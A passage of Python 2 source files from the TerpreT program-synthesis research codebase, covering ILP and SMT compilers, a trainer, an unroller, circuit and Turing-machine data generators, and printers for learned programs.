parsed_model = tptv1.translate_to_tptv1(parsed_model, data, hypers)
#print astunparse.unparse(parsed_model)
tree = unroller.unroll_and_flatten(parsed_model,
do_checks=False,
print_info=False)
print astunparse.unparse(tree)
global_case = make_case_node(tree.body, None, None)
# print "Declarations"
# global_decls = u.decls_in_case_node(global_case)
# for decl in global_decls:
# print decl
# print
# print "Resolving variable uses..."
factors = factors_in_case_node(global_case)
for factor in factors:
factor.resolve_variables()
declare_local_marginals(global_case)
declare_factor_local_marginals(global_case)
make_cross_level_constraints(global_case)
make_total_probability_constraints(global_case)
make_local_consistency_constraints(global_case)
make_objective(global_case)
for const in global_case.constants:
lpw.add_constant(const.name, const.value)
for rtf in global_case.runtime_functions:
lpw.add_runtime_function(rtf)
result_filename = os.path.join(out_dir, '%s.py' % make_matlab_filename(out_name))
with open(result_filename, 'w') as out_stream:
lpw.dump(out_stream)
make_mat_file(result_filename)
return
if __name__ == "__main__":
args = docopt(__doc__)
source_filename = args['MODEL']
hypers_filename = args['HYPERS']
data_filename = args['DATA']
out_dir = args.get('OUTDIR', None) or "compiled/ilp/"
out_dir = os.path.join(out_dir, "")
train_batch = args.get('--train-batch', 'train') or 'train'
try:
compile_ilp(source_filename, hypers_filename, data_filename,
train_batch, out_dir)
except:
type, value, tb = sys.exc_info()
traceback.print_exc()
pdb.post_mortem(tb)
```
#### File: TerpreT/bin/compile_smt.py
```python
import sys
import os
sys.path.append(os.path.join(os.path.dirname(__file__), "..", "lib"))
from docopt import docopt
import traceback
import pdb
import ast
import json
# If you are using Debian/Ubuntu packages, you'll need this:
from z3.z3 import IntVal, Solver, init
import config
init(config.LIB_Z3_PATH)
# If you have installed z3 locally, you will need something like this:
# from z3 import IntVal, Solver, init
# init('/path/to/local/installation/lib/libz3.so')
from terpret_z3 import ToZ3ConstraintsVisitor
import unroller
import utils as u
import tptv1
def compile_smt(model_filename, hypers_filename, data_filename,
train_batch, out_dir):
(parsed_model, data, hypers, out_name) = u.read_inputs(model_filename,
hypers_filename,
data_filename,
train_batch)
print ("Unrolling execution model.")
parsed_model = u.replace_hypers(parsed_model, hypers)
unrolled_parsed_model = unroller.unroll_and_flatten(parsed_model,
do_checks=False,
print_info=False)
input_dependents = tptv1.get_input_dependent_vars(unrolled_parsed_model)
idx = 1
constraints = []
z3compilers = []
for i in data['instances']:
print ("Generating SMT constraint for I/O example %i." % idx)
z3compiler = ToZ3ConstraintsVisitor(tag="__ex%i" % idx, variables_to_tag=input_dependents)
constraints.extend(z3compiler.visit(unrolled_parsed_model))
for var_name, vals in i.iteritems():
if vals is None:
pass
elif isinstance(vals, list):
for i, val in enumerate(vals):
if val is not None:
var_name_item = "%s_%s" % (var_name, i)
constraints.append(
z3compiler.get_expr(var_name_item) == IntVal(val))
else:
constraints.append(
z3compiler.get_expr(var_name) == IntVal(vals))
z3compilers.append(z3compiler)
idx = idx + 1
# Unify things:
z3compiler = z3compilers[0]
for i in xrange(1, len(z3compilers)):
z3compilerP = z3compilers[i]
for param in z3compiler.get_params():
constraints.append(
z3compiler.get_expr(param) == z3compilerP.get_expr(param))
out_file_name = os.path.join(out_dir, out_name + ".smt2")
print "Writing SMTLIB2 benchmark info to '%s'." % out_file_name
if not os.path.isdir(out_dir):
os.makedirs(out_dir)
solver = Solver()
idx = 0
for c in constraints:
# Debugging helper if things unexpectedly end up UNSAT:
# solver.assert_and_track(c, "c%i" % idx)
solver.add(c)
idx = idx + 1
with open(out_file_name, 'w') as f:
f.write(solver.to_smt2())
f.write("(get-model)")
# Debugging helper if things unexpectedly end up UNSAT:
# print solver.check()
# core = solver.unsat_core()
# print "Size of unsat core: %i" % len(core)
# idx = 0
# for c in constraints:
# if Bool("c%i" % idx) in core:
# print "CORE: %s" % (constraints[idx])
# idx = idx + 1
if __name__ == "__main__":
args = docopt(__doc__)
source_filename = args['MODEL']
hypers_filename = args['HYPERS']
data_filename = args['DATA']
out_dir = args.get('OUTDIR', None) or "compiled/smt2_files/"
out_dir = os.path.join(out_dir, "")
train_batch = args.get('--train-batch', 'train') or 'train'
try:
compile_smt(source_filename, hypers_filename, data_filename,
train_batch, out_dir)
except:
type, value, tb = sys.exc_info()
traceback.print_exc()
pdb.post_mortem(tb)
```
#### File: TerpreT/bin/fp_train.py
```python
import sys, os
sys.path.append(os.path.join(os.path.dirname(__file__), "..", "lib"))
from docopt import docopt
import traceback
import pdb
import trainer
from custom_train import CustomTrainer
import train
import tensorflow as tf
class FPTrainer(CustomTrainer):
@staticmethod
def default_train_hypers():
return {
"optimizer": "rmsprop",
"num_epochs": 3000,
"stop_below_loss": 0.005,
"learning_rate": 0.1,
"learning_rate_decay": .9,
"momentum": 0.0,
"minibatch_size": -1,
"print_frequency": 100,
"gradientClipC2": 1.0,
"fGradientNoise": .01,
"fGradientNoiseGamma": .55,
"fEntropyBonusDecayRate": .5,
"dirichletInitScale": 2
}
def __init__(self, model, model_module, model_hypers, train_hypers, data,
seed=0, do_debug=False, make_log=False):
super(FPTrainer, self).__init__(model, model_module, model_hypers, train_hypers, data,
seed=seed, do_debug=do_debug, make_log=make_log)
if __name__ == "__main__":
args = docopt(__doc__)
test_batches = args.get('--test-batches', None)
if test_batches is not None:
args['--test-batch'] = test_batches.split(',')
try:
train.load_and_run(args, FPTrainer)
except:
if args.get('--debug', False):
type, value, tb = sys.exc_info()
traceback.print_exc()
pdb.post_mortem(tb)
else:
raise
```
#### File: TerpreT/bin/unroll.py
```python
import sys, os
sys.path.append(os.path.join(os.path.dirname(__file__), "..", "lib"))
from docopt import docopt
import ast
import astunparse
import copy
import error
from error import check_type
import pdb
import itertools
import traceback
import json
import utils as u
import unroller
def run(source_filename, hypers_filename=None):
source = open(source_filename, 'r').read()
if hypers_filename is None:
hypers_list = {"default": ""}
else:
with open(hypers_filename, 'r') as f:
hypers_list = json.load(f)
for hypers_name, hypers in hypers_list.iteritems():
module = ast.parse(source)
if hypers != "":
module = u.replace_hypers(module, hypers)
unrolled_node = unroller.unroll_and_flatten(module, do_checks=True)
print(astunparse.unparse(unrolled_node))
# Only do the first one...
break
return None
if __name__ == "__main__":
args = docopt(__doc__)
model_filename = args['MODEL']
hypers_filename = args.get('HYPERS', None)
try:
run(model_filename, hypers_filename=hypers_filename)
except:
type, value, tb = sys.exc_info()
traceback.print_exc()
pdb.post_mortem(tb)
```
#### File: data/generators/make_circuit_data.py
```python
from collections import defaultdict
from copy import copy
from docopt import docopt
import json
import numpy as np
import os
import pdb
import re
import sys
import traceback
HYPERS_RE = re.compile("W(\d+)_G(\d+)_O(\d+)")
def make_hypers(wire_num, gate_num, output_num):
return {'numWires': int(wire_num),
'numGates': int(gate_num),
'numOutputs': int(output_num)}
def get_hypers_name(hypers):
return "W%i_G%i_O%i" % (hypers['numWires'],
hypers['numGates'],
hypers['numOutputs'])
def get_hypers_from_string(hypers_name):
match = HYPERS_RE.match(hypers_name)
(wire_num, gate_num, output_num) = match.groups()
return make_hypers(wire_num, gate_num, output_num)
def make_shift_ex():
hypers = make_hypers(4, 5, 3)
instances = []
for n in xrange(8):
in_as_binary = "{0:03b}".format(n)
in_as_binary = [int(i) for i in in_as_binary]
out_as_binary = copy(in_as_binary)
if in_as_binary[0] == 1:
out_as_binary[1] = in_as_binary[2]
out_as_binary[2] = in_as_binary[1]
instances.append({'initial_wires': in_as_binary + [0],
'final_wires': out_as_binary})
return {'batch_name': "train",
'hypers': get_hypers_name(hypers),
'instances': instances}
def make_adder_ex(num_wires, num_gates):
assert num_wires >= 3
hypers = make_hypers(num_wires, num_gates, 2)
instances = []
for n in xrange(8):
in_as_binary = [int(i) for i in "{0:03b}".format(n)]
out_as_dec = sum(x == 1 for x in in_as_binary)
out_as_binary = [int(i) for i in "{0:02b}".format(out_as_dec)]
instances.append({'initial_wires': in_as_binary + [0] * (num_wires - 3),
'final_wires': out_as_binary})
return {'batch_name': "train",
'hypers': get_hypers_name(hypers),
'instances': instances}
def make_full_adder_ex(num_examples, num_wires, num_gates, seed):
assert num_wires >= 4
hypers = make_hypers(num_wires, num_gates, 3)
instances = []
np.random.seed(seed)
for _ in xrange(num_examples):
num = np.random.randint(0, 16)
in_as_binary = [int(i) for i in "{0:04b}".format(num)]
a = 2 * in_as_binary[0] + in_as_binary[1]
b = 2 * in_as_binary[2] + in_as_binary[3]
res = a + b
out_as_binary = [int(i) for i in "{0:03b}".format(res)]
instances.append({'initial_wires': in_as_binary + [0] * (num_wires - 4),
'final_wires': out_as_binary})
return {'batch_name': "train",
'hypers': get_hypers_name(hypers),
'instances': instances}
def write_hypers(outdir, hypers):
if not(os.path.isdir(outdir)):
os.makedirs(outdir)
out_file = os.path.join(outdir, "circuit.hypers.json")
with open(out_file, 'w') as f:
json.dump({get_hypers_name(hypers): hypers for hypers in hypers}, f, indent=2)
def write_data(outdir, examples, name):
by_hypers = defaultdict(list)
for exampleset in examples:
by_hypers[exampleset['hypers']].append(exampleset)
if not(os.path.isdir(outdir)):
os.makedirs(outdir)
for (hypers_name, examplesetlist) in by_hypers.iteritems():
out_file = os.path.join(outdir, "circuit_%s_%s.data.json" % (name, hypers_name))
with open(out_file, 'w') as f:
json.dump(examplesetlist, f, indent=2)
if __name__ == "__main__":
args = docopt(__doc__)
outdir = args.get('OUTDIR', None) or '.'
seeds = [int(s) for s in args['--seeds'].split(",")]
wire_nums = [int(n) for n in args['--num-wires'].split(",")]
gate_nums = [int(n) for n in args['--num-gates'].split(",")]
example_num = int(args['--num-examples'])
shift_examples = []
adder_examples = []
full_adder_examples = []
try:
shift_examples.append(make_shift_ex())
for wire_num in wire_nums:
for gate_num in gate_nums:
adder_examples.append(make_adder_ex(wire_num, gate_num))
for seed in seeds:
full_adder_examples.append(make_full_adder_ex(example_num, wire_num, gate_num, seed))
hypers_names = set(ex['hypers']
for ex in shift_examples + adder_examples + full_adder_examples)
hypers_list = [get_hypers_from_string(hypers_name)
for hypers_name in hypers_names]
write_hypers(outdir, hypers_list)
write_data(outdir, shift_examples, "shift")
write_data(outdir, adder_examples, "adder")
write_data(outdir, full_adder_examples, "full_adder")
except:
type, value, tb = sys.exc_info()
traceback.print_exc()
pdb.post_mortem(tb)
```
#### File: data/generators/make_turing_data.py
```python
from collections import defaultdict
from docopt import docopt
import json
import numpy as np
import os
import pdb
import sys
import traceback
def get_batch_name(seed):
if seed == 0:
return "train"
else:
return "seed__%i" % seed
def get_hypers_name(hypers):
return "L%i_T%i_H%i_S%i" % (hypers['tapeLength'],
hypers['numTimesteps'],
hypers['numHeadStates'],
hypers['numTapeSymbols'])
def make_one_prepend_ex(hypers):
assert hypers['numTapeSymbols'] >= 2
data_len = np.random.randint(1, hypers['tapeLength'] - 1)
initial_blanks = [hypers['numTapeSymbols'] - 1] * (hypers['tapeLength'] - data_len - 1)
final_blanks = [hypers['numTapeSymbols'] - 1] * (hypers['tapeLength'] - data_len - 2)
initial_data = [np.random.randint(0, hypers['numTapeSymbols'] - 1)
for _ in range(data_len + 1)]
final_data = [0] + initial_data
return {'initial_tape': initial_data + initial_blanks,
'final_tape': final_data + final_blanks,
'final_is_halted': 1}
def make_one_invert_ex(hypers):
assert hypers['numTapeSymbols'] == 3
data_len = np.random.randint(1, hypers['tapeLength'] - 1)
blanks = [2] * (hypers['tapeLength'] - data_len - 1)
initial_data = [np.random.randint(0, 2)
for _ in range(data_len + 1)]
final_data = [1 - c for c in initial_data]
return {'initial_tape': initial_data + blanks,
'final_tape': final_data + blanks,
'final_is_halted': 1}
def make_one_dec_ex(hypers):
assert hypers['numTapeSymbols'] == 3
num_bits = np.random.randint(1, hypers['tapeLength'])
blanks = [2] * (hypers['tapeLength'] - num_bits)
decimal_input = np.random.randint(2**(num_bits - 1), 2**num_bits)
binary_input = ("{0:0" + str(num_bits) + "b}").format(decimal_input)
binary_final = ("{0:0" + str(num_bits) + "b}").format(decimal_input - 1)
return {'initial_tape': [int(b) for b in binary_input] + blanks,
'final_tape': [int(b) for b in binary_final] + blanks,
'final_is_halted': 1}
def make_ex_data(hypers, seed, example_num, make_one_fun):
np.random.seed(seed)
instances = [make_one_fun(hypers) for _ in xrange(example_num)]
return {'batch_name': get_batch_name(seed),
'hypers': get_hypers_name(hypers),
'instances': instances}
def make_hypers(tape_len, symbol_num, state_num, timestep_num):
return {'tapeLength': tape_len,
'numTimesteps': timestep_num,
'numHeadStates': state_num,
'numTapeSymbols': symbol_num}
def write_hypers(outdir, hypers, name):
if not(os.path.isdir(outdir)):
os.makedirs(outdir)
out_file = os.path.join(outdir, "turing_%s_hypers.json" % name)
print out_file
with open(out_file, 'w') as f:
json.dump({get_hypers_name(hypers): hypers}, f, indent=2)
# {get_hypers_name(hypers): hypers for hypers in hypers},
def write_data(outdir, examples, name):
by_hypers = defaultdict(list)
for exampleset in examples:
by_hypers[exampleset['hypers']].append(exampleset)
if not(os.path.isdir(outdir)):
os.makedirs(outdir)
for (hypers_name, examplesetlist) in by_hypers.iteritems():
out_file = os.path.join(outdir, "turing_%s_data.json" % (name))
print out_file
with open(out_file, 'w') as f:
json.dump(examplesetlist, f, indent=2)
if __name__ == "__main__":
args = docopt(__doc__)
outdir = args.get('OUTDIR', None) or '.'
seeds = [int(s) for s in args['--seeds'].split(",")]
tape_lengths = [int(l) for l in args['--tape-length'].split(",")]
symbol_nums = [int(n) for n in args['--num-tape-symbols'].split(",")]
state_nums = [int(n) for n in args['--num-head-states'].split(",")]
timestep_nums = [int(n) for n in args['--num-timesteps'].split(",")]
example_num = int(args['--num-examples'])
hypers_list = []
invert_examples = []
prepend_examples = []
decrement_examples = []
try:
hypers_dict = {
"invert": (5, 3, 2, 6), # invert
"prepend": (5, 3, 3, 6), # prepend zero
"decrement": (5, 3, 3, 9), # binary decrement
}
for name, hyper_values in hypers_dict.iteritems():
hypers = make_hypers(*hyper_values)
if name == "invert":
make_one_fn = make_one_invert_ex
elif name == "prepend":
make_one_fn = make_one_prepend_ex
elif name == "decrement":
make_one_fn = make_one_dec_ex
else:
assert False
for seed in seeds:
example = make_ex_data(hypers, seed, example_num, make_one_fn)
write_hypers(outdir, hypers, name)
write_data(outdir, [example], name)
except:
type, value, tb = sys.exc_info()
traceback.print_exc()
pdb.post_mortem(tb)
```
#### File: TerpreT/lib/error.py
```python
import ast
import sys
def error(msg, node):
'''
Print an error that includes line and column information.
'''
msg = '\n'.join([' ' + line for line in msg.split('\n')])
lineno = node.lineno if hasattr(node, 'lineno') else 0
col_offset = node.col_offset if hasattr(node, 'col_offset') else 0
print >> sys.stderr, "Error (line {}, col {}):\n{}\n".format(lineno, col_offset, msg)
def fatal_error(msg, node):
'''
Print an error message and then exit with a negative status.
'''
error(msg, node)
raise RuntimeError('Fatal error during compilation.')
def check_type(node, type_):
if not isinstance(node, type_):
msg = "Expected a {} but got a {}.\n{}".format(type_.__name__, type(node).__name__, ast.dump(node))
fatal_error(msg, node)
```
#### File: TerpreT/lib/fp_printer_utils.py
```python
import numpy as np
import re
def unit_dist(x):
return [(x, 1.0)]
def collapsed_dist_to_str(dist):
(x, _) = max(dist, key=lambda (_, p): p)
return str(x)
def pruned_dist_to_str(dist):
if len(dist) == 1:
return str(dist[0][0])
out = '['
for (i, (x, p)) in enumerate(dist):
out += '{}: {:03.3f}'.format(x, p)
if i < len(dist) - 1:
out += ', '
out += ']'
return out
def dist_to_str(dist):
return pruned_dist_to_str(dist)
def get_for_ex(data_point, ex_id):
# If this is shared over all examples (e.g., stack[0]), it will have
# only one dim:
if data_point.ndim == 1:
return data_point
else:
return data_point[ex_id]
class ProbDataPrinter(object):
def __init__(self, par_prob_bound):
self.par_prob_bound = par_prob_bound
def name_dist(self, names, dist):
if self.par_prob_bound is None:
return [max(zip(names, dist), key=lambda x: x[1])]
else:
out = []
for (n, p) in zip(names, dist):
if p > self.par_prob_bound:
out.append((n, p))
return out
def func_dist(self, func, dist):
if isinstance(dist, np.float64):
return [(func(0), dist)]
if self.par_prob_bound is None:
(max_idx, max_prob) = max(enumerate(dist), key=lambda x: x[1])
return [(func(max_idx), max_prob)]
else:
out = []
for (i, p) in enumerate(dist):
if p > self.par_prob_bound:
out.append((func(i), p))
return out
def get_combinator(self, dist):
return self.name_dist(['foldli', 'mapi', 'zipWithi'], dist)
def get_looptype(self, dist):
return self.name_dist(['foreach', 'foreachZip'], dist)
def get_cmb_instruction(self, dist):
names = ['cons', 'car', 'cdr', 'nil', 'add', 'inc', 'eq', 'gt', 'and',
'ite', 'one', 'noop', 'dec', 'or']
return self.name_dist(names, dist)
def get_asm_instruction(self, dist):
names = ['cons', 'car', 'cdr', 'nil', 'add', 'inc', 'eq', 'gt', 'and',
'one', 'noop', 'dec', 'or', 'jz', 'jnz', 'return']
return self.name_dist(names, dist)
def get_register(self, dist, prefix="r", shift=0):
return self.func_dist(lambda i: '{}{}'.format(prefix, i + shift), dist)
def register_dist_to_string(self, dist, prefix="r"):
return dist_to_str(self.get_register(dist, prefix))
def assembly_loop_register_dist_to_string(self, num_registers):
def go(dist):
# Like register_dist_to_string, but with renaming:
arg_dist = []
for (arg_idx, prob) in self.get_register(dist, prefix=""):
arg_idx = int(arg_idx)
if arg_idx < num_registers:
name = "r%i" % arg_idx
elif arg_idx == num_registers:
name = "ele1"
elif arg_idx == num_registers + 1:
name = "ele2"
else:
raise Exception("Unhandled register.")
arg_dist.append((name, prob))
return dist_to_str(arg_dist)
return go
def closure_mutable_register_dist_to_string(self, num_inputs, extra_register_num):
def go(dist):
# Like register_dist_to_string, but with renaming:
arg_dist = []
for (arg_idx, prob) in self.get_register(dist, prefix=""):
arg_idx = int(arg_idx)
if arg_idx < num_inputs + extra_register_num:
name = "r%i" % arg_idx
elif arg_idx == num_inputs + extra_register_num:
name = "ele"
elif arg_idx == num_inputs + extra_register_num + 1:
name = "acc"
elif arg_idx == num_inputs + extra_register_num + 2:
name = "idx"
arg_dist.append((name, prob))
return dist_to_str(arg_dist)
return go
def closure_register_dist_to_string(self, num_inputs, prefix_length, closure_stmt_idx):
def go(dist):
# Like register_dist_to_string, but with renaming:
arg_dist = []
for (arg_idx, prob) in self.get_register(dist, prefix=""):
arg_idx = int(arg_idx)
if arg_idx < num_inputs + prefix_length:
name = "r%i" % arg_idx
elif arg_idx < num_inputs + prefix_length + closure_stmt_idx:
name = "c%i" % (arg_idx - (num_inputs + prefix_length))
elif arg_idx == num_inputs + prefix_length + closure_stmt_idx:
name = "ele"
elif arg_idx == num_inputs + prefix_length + closure_stmt_idx + 1:
name = "acc"
elif arg_idx == num_inputs + prefix_length + closure_stmt_idx + 2:
name = "idx"
arg_dist.append((name, prob))
return dist_to_str(arg_dist)
return go
def get_value(self, dist):
return self.func_dist(lambda i: '{}'.format(i), dist)
class StackPrinter(object):
def __init__(self, prog_printer):
self.prog_printer = prog_printer
def str_for_var(self, var, ex_id):
return dist_to_str(self.prog_printer.data_printer.get_value(get_for_ex(self.prog_printer.var_data[var], ex_id)))
def get_stack_cell(self, ptr, ex_id):
return (self.str_for_var("stackCarVal_%i" % (ptr), ex_id),
self.str_for_var("stackCdrVal_%i" % (ptr), ex_id))
def run(self, ex_id):
print('Stack:')
for ptr in range(1, self.prog_printer.stack_size):
args = (ptr,) + self.get_stack_cell(ptr, ex_id)
print(" stack[%i] = (Int %s, Ptr %s)" % args)
class RegisterPrinter(object):
def __init__(self, prog_printer):
self.prog_printer = prog_printer
def str_for_var(self, var, ex_id):
return dist_to_str(self.prog_printer.data_printer.get_value(get_for_ex(self.prog_printer.var_data[var], ex_id)))
class ImmutableRegisterPrinter(RegisterPrinter):
def __init__(self, prog_printer):
super(ImmutableRegisterPrinter, self).__init__(prog_printer)
def print_reg(self, reg_name_template, ex_id):
raise NotImplementedError()
def run(self, ex_id):
print('Registers:')
# Inputs + prefix registers:
for reg_idx in range(self.prog_printer.input_num +
self.prog_printer.prefix_length):
self.print_reg("reg%%sVal_%i" % reg_idx, ex_id)
# Lambda registers:
for loop_step in range(self.prog_printer.max_loop_steps):
list_over = self.str_for_var("listIsOver_%i" % loop_step, ex_id)
print(" listIsOver[%i] = %s" % (loop_step, list_over))
if list_over != '1':
for reg_idx in range(self.prog_printer.lambda_length):
self.print_reg("lambdaReg%%sVal_%i_%i" % (loop_step,
reg_idx),
ex_id)
# Combinator result + suffix registers:
prefix_reg_num = self.prog_printer.input_num + self.prog_printer.prefix_length
for reg_idx in range(1 + self.prog_printer.suffix_length):
self.print_reg("reg%%sVal_%i" % (prefix_reg_num + reg_idx), ex_id)
class TypedImmutableRegisterPrinter(ImmutableRegisterPrinter):
def __init__(self, prog_printer):
super(TypedImmutableRegisterPrinter, self).__init__(prog_printer)
def print_reg(self, reg_name_template, ex_id):
reg_name = re.sub(r'_(\d+)', r'[\1]', reg_name_template % '')
args = (reg_name,
self.str_for_var(reg_name_template % 'Ptr', ex_id),
self.str_for_var(reg_name_template % 'Int', ex_id),
self.str_for_var(reg_name_template % 'Bool', ex_id))
print(" %s = (Ptr %s, Int %s, Bool %s)" % args)
class UntypedImmutableRegisterPrinter(ImmutableRegisterPrinter):
def __init__(self, prog_printer):
super(UntypedImmutableRegisterPrinter, self).__init__(prog_printer)
def print_reg(self, reg_name_template, ex_id):
reg_name = re.sub(r'_(\d+)', r'[\1]', reg_name_template % '')
args = (reg_name,
self.str_for_var(reg_name_template % (''), ex_id))
print(" %s = %s" % args)
class MutableRegisterPrinter(RegisterPrinter):
def __init__(self, prog_printer):
super(MutableRegisterPrinter, self).__init__(prog_printer)
self.num_timesteps = self.prog_printer.prefix_length + \
(1 + self.prog_printer.lambda_length) * self.prog_printer.max_loop_steps + \
self.prog_printer.suffix_length + 2
self.num_registers = self.prog_printer.input_num + self.prog_printer.hypers['extraRegisterNum']
def run(self, ex_id):
for t in range(self.num_timesteps):
if t == 0:
loop_iter = None
print('Registers (t = %d), initial:' % (t))
elif t <= self.prog_printer.prefix_length:
loop_iter = None
print('Registers (t = %d), prefix:' % (t))
elif t <= self.prog_printer.prefix_length + (self.prog_printer.lambda_length + 1) * self.prog_printer.max_loop_steps:
loop_iter = (t - self.prog_printer.prefix_length - 1) / (self.prog_printer.lambda_length + 1)
print('Registers (t = %d), loop iter %i:' % (t, loop_iter))
else:
print('Registers (t = %d), suffix:' % (t))
for r in range(self.num_registers):
self.print_reg("reg%%sVal_%i_%i" % (t, r), ex_id)
print("")
class UntypedMutableRegisterPrinter(MutableRegisterPrinter):
def __init__(self, prog_printer):
super(UntypedMutableRegisterPrinter, self).__init__(prog_printer)
def print_reg(self, reg_name_template, ex_id):
reg_name = re.sub(r'_(\d+)', r'[\1]', reg_name_template % '')
args = (reg_name,
self.str_for_var(reg_name_template % '', ex_id))
print(' %s = %s' % args)
class TypedMutableRegisterPrinter(MutableRegisterPrinter):
def __init__(self, prog_printer):
super(TypedMutableRegisterPrinter, self).__init__(prog_printer)
def print_reg(self, reg_name_template, ex_id):
reg_name = re.sub(r'_(\d+)', r'[\1]', reg_name_template % '')
args = (reg_name,
self.str_for_var(reg_name_template % 'Ptr', ex_id),
self.str_for_var(reg_name_template % 'Int', ex_id),
self.str_for_var(reg_name_template % 'Bool', ex_id))
print(" %s = (Ptr %s, Int %s, Bool %s)" % args)
class OutputPrinter(object):
def __init__(self, prog_printer):
self.prog_printer = prog_printer
def str_for_var(self, var, ex_id):
return dist_to_str(self.prog_printer.data_printer.get_value(get_for_ex(self.prog_printer.var_data[var], ex_id)))
def run(self, ex_id):
print('Output:')
self.print_output_reg(ex_id)
for ptr in range(self.prog_printer.stack_size):
args = (ptr, self.str_for_var('outputListVal_%d' % ptr, ex_id))
print('outputList[%d] = %s' % args)
class TypedOutputPrinter(OutputPrinter):
def __init__(self, prog_printer):
super(TypedOutputPrinter, self).__init__(prog_printer)
def print_output_reg(self, ex_id):
reg_name_template = "outputReg%sVal"
args = (self.str_for_var(reg_name_template % 'Ptr', ex_id),
self.str_for_var(reg_name_template % 'Int', ex_id),
self.str_for_var(reg_name_template % 'Bool', ex_id))
print("outputReg = (Ptr %s, Int %s, Bool %s)" % args)
class UntypedOutputPrinter(OutputPrinter):
def __init__(self, prog_printer):
super(UntypedOutputPrinter, self).__init__(prog_printer)
def print_output_reg(self, ex_id):
print('outputReg = %s' % self.str_for_var('outputRegVal', ex_id))
class ProgramPrinter(object):
def __init__(self, par_prob_bound, data, hypers):
self.data_printer = ProbDataPrinter(par_prob_bound)
self.data = data
self.hypers = hypers
self.var_data = data['variables']
self.input_stack_size = hypers['inputStackSize']
self.input_num = hypers['inputNum']
raw_solution = data['variables']
self.solution = {k: raw_solution[k].value for k in raw_solution.keys()}
def str_for_var(self, var, ex_id):
return dist_to_str(self.data_printer.get_value(get_for_ex(self.var_data[var], ex_id)))
class CombinatorPrinter(ProgramPrinter):
def __init__(self, par_prob_bound, data, hypers):
super(CombinatorPrinter, self).__init__(par_prob_bound, data, hypers)
self.prefix_length = hypers['prefixLength']
self.lambda_length = hypers.get('lambdaLength', 0)
self.suffix_length = hypers['suffixLength']
self.max_loop_steps = self.input_stack_size + self.prefix_length
self.stack_size = 1 + self.input_stack_size + self.prefix_length \
+ self.max_loop_steps * (1 + self.lambda_length) + self.suffix_length
self.is_mutable_model = 'extraRegisterNum' in hypers
self.stack_printer = StackPrinter(self)
def stmt_to_str(self,
par_template,
immutable_reg_name=None,
arg_pp=None):
if arg_pp is None:
arg_pp = self.data_printer.register_dist_to_string
# Determine where the result is written to:
if self.is_mutable_model:
out_data = self.solution.get(par_template % 'Out', None)
stmt_str = arg_pp(out_data) + " <- "
eol = ";"
else:
stmt_str = "let %s = " % immutable_reg_name
eol = " in"
instr_dist = self.solution[par_template % '']
instr_str = dist_to_str(self.data_printer.get_cmb_instruction(instr_dist))
arg_dists = [self.solution[par_template % 'Arg1'],
self.solution[par_template % 'Arg2'],
self.solution[par_template % 'Condition']]
instr_arity = 3
if instr_str in ["nil", "one"]:
instr_arity = 0
elif instr_str in ["inc", "dec", "cdr", "car", "noop"]:
instr_arity = 1
elif instr_str in ["cons", "add", "eq", "gt", "and", "or"]:
instr_arity = 2
if instr_str == "ite":
stmt_str += "if %s then %s else %s" % (arg_pp(arg_dists[2]),
arg_pp(arg_dists[0]),
arg_pp(arg_dists[1]))
else:
stmt_str += instr_str
for arg_idx in range(instr_arity):
stmt_str = stmt_str + " " + arg_pp(arg_dists[arg_idx])
return (stmt_str + eol)
def print_program(self):
# Inputs:
for i in range(self.input_num):
if self.is_mutable_model:
print("r%i <- Input();" % i)
else:
print ("let r%i = Input() in" % i)
# Prefixes:
for i in range(self.prefix_length):
print(self.stmt_to_str("prefixInstructions%%s_%i" % i, "r%i" % (self.input_num + i)))
# Combinator:
closure_stmts = []
for i in range(self.lambda_length):
if self.is_mutable_model:
closure_reg_pp = self.data_printer.closure_mutable_register_dist_to_string(self.input_num,
self.extra_register_num)
else:
closure_reg_pp = self.data_printer.closure_register_dist_to_string(self.input_num,
self.prefix_length,
i)
stmt_str = self.stmt_to_str("lambdaInstructions%%s_%i" % i,
"c%i" % i,
closure_reg_pp)
closure_stmts.append(stmt_str)
if self.is_mutable_model:
closure_return = "r%i" % (self.register_num - 1)
else:
closure_return = self.data_printer.register_dist_to_string(self.solution["lambdaReturnReg"], prefix="c")
closure_stmts.append(closure_return)
comb = dist_to_str(self.data_printer.get_combinator(self.solution['combinator']))
if comb == "foldli":
comb_args = self.data_printer.register_dist_to_string(self.solution["combinatorInputList1"]) + \
" " + self.data_printer.register_dist_to_string(self.solution["combinatorStartAcc"])
elif comb == "mapi":
comb_args = self.data_printer.register_dist_to_string(self.solution["combinatorInputList1"])
elif comb == "zipWithi":
comb_args = self.data_printer.register_dist_to_string(self.solution["combinatorInputList1"]) + \
" " + self.data_printer.register_dist_to_string(self.solution["combinatorInputList2"])
else:
comb_args = self.data_printer.register_dist_to_string(self.solution["combinatorInputList1"]) + \
" " + self.data_printer.register_dist_to_string(self.solution["combinatorInputList2"]) + \
" " + self.data_printer.register_dist_to_string(self.solution["combinatorStartAcc"])
comb_pp_args = (comb,
"\n ".join([""] + closure_stmts),
comb_args)
if self.lambda_length > 0:
comb_str = "%s (λ ele acc idx -> %s) %s" % comb_pp_args
else:
comb_str = "0"
if 'combinatorOut' in self.solution:
print("%s <- %s" % (self.data_printer.register_dist_to_string(self.solution['combinatorOut']),
comb_str))
else:
print("let r%i = %s" % (self.input_num + self.prefix_length, comb_str))
# Suffix:
for i in range(self.suffix_length):
print(self.stmt_to_str("suffixInstructions%%s_%i" % i,
"r%i" % (self.input_num + self.prefix_length + 1 + i)))
if self.is_mutable_model:
prog_return = "r%i" % (self.register_num - 1)
else:
prog_return = self.data_printer.register_dist_to_string(self.solution["programReturnReg"])
print(prog_return)
def print_trace(self, ex_id):
# Hyperparams:
print('Hyperparams:')
for (hpp, value) in self.hypers.iteritems():
print(' %s = %d' % (hpp, value))
print("")
self.stack_printer.run(ex_id)
self.register_printer.run(ex_id)
self.output_printer.run(ex_id)
class CombinatorTypedPrinter(CombinatorPrinter):
def __init__(self, par_prob_bound, data, hypers):
super(CombinatorTypedPrinter, self).__init__(par_prob_bound, data, hypers)
self.output_printer = TypedOutputPrinter(self)
class CombinatorTypedImmutablePrinter(CombinatorTypedPrinter):
def __init__(self, par_prob_bound, data, hypers):
super(CombinatorTypedImmutablePrinter, self).__init__(par_prob_bound, data, hypers)
self.register_printer = TypedImmutableRegisterPrinter(self)
class CombinatorTypedMutablePrinter(CombinatorTypedPrinter):
def __init__(self, par_prob_bound, data, hypers):
super(CombinatorTypedMutablePrinter, self).__init__(par_prob_bound, data, hypers)
self.register_printer = TypedMutableRegisterPrinter(self)
self.extra_register_num = hypers['extraRegisterNum']
self.register_num = hypers['inputNum'] + hypers['extraRegisterNum']
class CombinatorUntypedPrinter(CombinatorPrinter):
